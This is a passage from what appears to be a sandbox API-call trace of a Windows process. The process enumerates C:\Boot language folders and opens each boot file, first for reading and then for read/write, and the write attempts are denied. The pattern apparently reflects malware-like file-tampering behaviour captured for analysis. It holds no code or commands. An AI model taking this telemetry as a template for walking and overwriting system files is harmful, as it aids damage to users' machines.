Flags=0x0, Size=0x20) returned 0x883b0 [0071.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.093] AreFileApisANSI () returned 1 [0071.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-HK\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-HK\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0071.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0071.094] AreFileApisANSI () returned 1 [0071.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0071.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0071.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-HK\\memtest.exe.mui") returned 30 [0071.094] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0071.094] GetFileType (hFile=0x41c) returned 0x1 [0071.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.094] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.094] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.094] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.095] CloseHandle (hObject=0x41c) returned 1 [0071.095] AreFileApisANSI () returned 1 [0071.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0071.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0071.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-HK\\memtest.exe.mui") returned 30 [0071.095] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.095] GetLastError () returned 0x5 [0071.095] GetLastError () returned 0x5 [0071.095] SetLastError (dwErrCode=0x5) [0071.095] GetLastError () returned 0x5 [0071.095] SetLastError (dwErrCode=0x5) [0071.095] GetLastError () returned 0x5 [0071.095] SetLastError (dwErrCode=0x5) [0071.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.095] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.095] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.095] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69308, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ꕘ")) returned 0 [0071.095] FindClose (in: hFindFile=0x78550 | out: hFindFile=0x78550) returned 1 [0071.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0071.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0071.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0071.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.096] AreFileApisANSI () returned 1 [0071.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-TW", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-TW", lpUsedDefaultChar=0x0) returned 14 [0071.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0071.097] AreFileApisANSI () returned 1 [0071.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0071.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0071.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\zh-TW") returned 14 [0071.097] CreateFileW (lpFileName="C:\\Boot\\zh-TW" (normalized: "c:\\boot\\zh-tw"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.097] GetLastError () returned 0x5 [0071.097] GetLastError () returned 0x5 [0071.097] SetLastError (dwErrCode=0x5) [0071.097] GetLastError () returned 0x5 [0071.097] SetLastError (dwErrCode=0x5) [0071.097] GetLastError () returned 0x5 [0071.097] SetLastError (dwErrCode=0x5) [0071.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.097] AreFileApisANSI () returned 1 [0071.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0071.097] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88720 [0071.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88720, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\zh-TW") returned 14 [0071.097] CreateFileW (lpFileName="C:\\Boot\\zh-TW" (normalized: "c:\\boot\\zh-tw"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.097] GetLastError () returned 0x5 [0071.097] GetLastError () returned 0x5 [0071.098] SetLastError (dwErrCode=0x5) [0071.098] GetLastError () returned 0x5 [0071.098] SetLastError (dwErrCode=0x5) [0071.098] GetLastError () returned 0x5 [0071.098] SetLastError (dwErrCode=0x5) [0071.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0071.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0071.098] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x1a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x7a910, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x1a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="")) returned 0 [0071.098] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0071.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0071.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0071.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.098] FindFirstFileExW (in: lpFileName="C:\\Boot\\zh-TW\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78e50 [0071.098] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.098] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.099] AreFileApisANSI () returned 1 [0071.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-TW\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0071.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0071.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0071.100] AreFileApisANSI () returned 1 [0071.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0071.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0071.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 30 [0071.100] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.100] GetFileType (hFile=0x428) returned 0x1 [0071.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.100] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.101] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.101] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.101] CloseHandle (hObject=0x428) returned 1 [0071.101] AreFileApisANSI () returned 1 [0071.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0071.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0071.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 30 [0071.101] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.101] GetLastError () returned 0x5 [0071.101] GetLastError () returned 0x5 [0071.101] SetLastError (dwErrCode=0x5) [0071.101] GetLastError () returned 0x5 [0071.101] SetLastError (dwErrCode=0x5) [0071.101] GetLastError () returned 0x5 [0071.101] SetLastError (dwErrCode=0x5) [0071.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0071.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 